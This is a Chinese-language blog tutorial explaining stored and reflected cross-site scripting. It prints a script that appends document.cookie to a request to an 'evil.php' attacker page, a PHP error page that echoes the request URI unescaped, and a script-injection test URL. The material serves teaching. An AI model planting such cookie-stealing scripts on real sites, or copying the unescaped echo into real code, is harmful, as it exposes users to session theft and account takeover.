web安全之 xss攻击

版权声明:本文为博主原创文章,未经博主允许不得转载。 https://blog.csdn.net/adley_app/article/details/85204271
  • xss攻击的全称是Cross-Site Scripting (XSS)攻击,是一种注入式攻击。基本的做法是把恶意代码注入到目标网站。由于浏览器在打开目标网站的时候并不知道哪些脚本是恶意的,所以浏览器会无差别执行恶意脚本,从而导致用户信息和一些敏感信息被盗取和泄漏。
  • xss一般分为两种类型,持久化的xss和非持久化的xss。

1 持久化xss

下面这个例子演示了攻击者如何通过注入恶意代码去盗取用户的cookie的。

假设攻击者在某个论坛发了个帖子,在帖子里包含了如下的恶意代码

<SCRIPT type="text/javascript">
var adr = '../evil.php?cakemonster=' + escape(document.cookie);
</SCRIPT>

那么其他用户在浏览这个帖子的时候,上面的代码就会被浏览器执行,从而将用户的cookie信息发送到了/evil.php?,这个攻击者搭建的恶意站点。由于cookie里包含了用户的一些登录态和敏感信息,所以访问这个帖子的用户会面临被盗号的风险。

还原一下这次攻击的过程:

攻击者在论坛发了包含恶意代码的帖子
一般来说这个帖子的内容会保存在数据库里(持久化)
攻击者诱导其他用户去访问这个帖子
其他用户访问该帖子时网站后台会从数据库里读取帖子的内容并发送给浏览器
浏览器渲染帖子的内容时执行了恶意脚本
恶意脚本将用户的cookie偷偷发送给恶意网站evil.php

2 非持久化的xss

上面的例子攻击代码持久化在了数据库里,非持久化的攻击则不需要这样,看下面的例子。

假设我们有这样的一个错误页面,用php实现的

<html>
<body>

<? php
print "Not found: " . urldecode($_SERVER["REQUEST_URI"]);
?>

</body>
</html>

当用户访问的页面不存在时候,上面的页面会自动加载,并且print "Not found: " . urldecode($_SERVER[“REQUEST_URI”]);这一行会打印出不存在页面的具体url。

举个例子,当用户访问 www.example.com/page_missing 页面时,由于page_missing页面不存在,所以example.com会自动跳转到page_missing路径,并在页面上打印出Not found: page_missing字符串。

如果攻击者构造了这样一个链接,诱导用户访问http://wwww.example.com/<script>alert("TEST");</script>,那么普通用户访问该链接时,因为 /<script>alert("TEST");</script> 会被打印在页面上并当作普通脚本执行,这样一来,如果攻击者构造的脚本里包含获取用户敏感信息的代码,那么用户的信息将被泄漏。

还原一下这次攻击的过程:

攻击者构造http://wwww.example.com/<script>alert("TEST");</script>链接,引诱普通用户访问
普通用户访问后,跳转到错误页面
错误页面会执行恶意脚本,造成用户信息泄漏

总结

xss攻击是目前最常见的web攻击形式,大家可以通过上面的例子管中窥豹一下,其核心的攻击方式是恶意代码注入,浏览器将注入的代码当成普通脚本正常执行

猜你喜欢

转载自blog.csdn.net/adley_app/article/details/85204271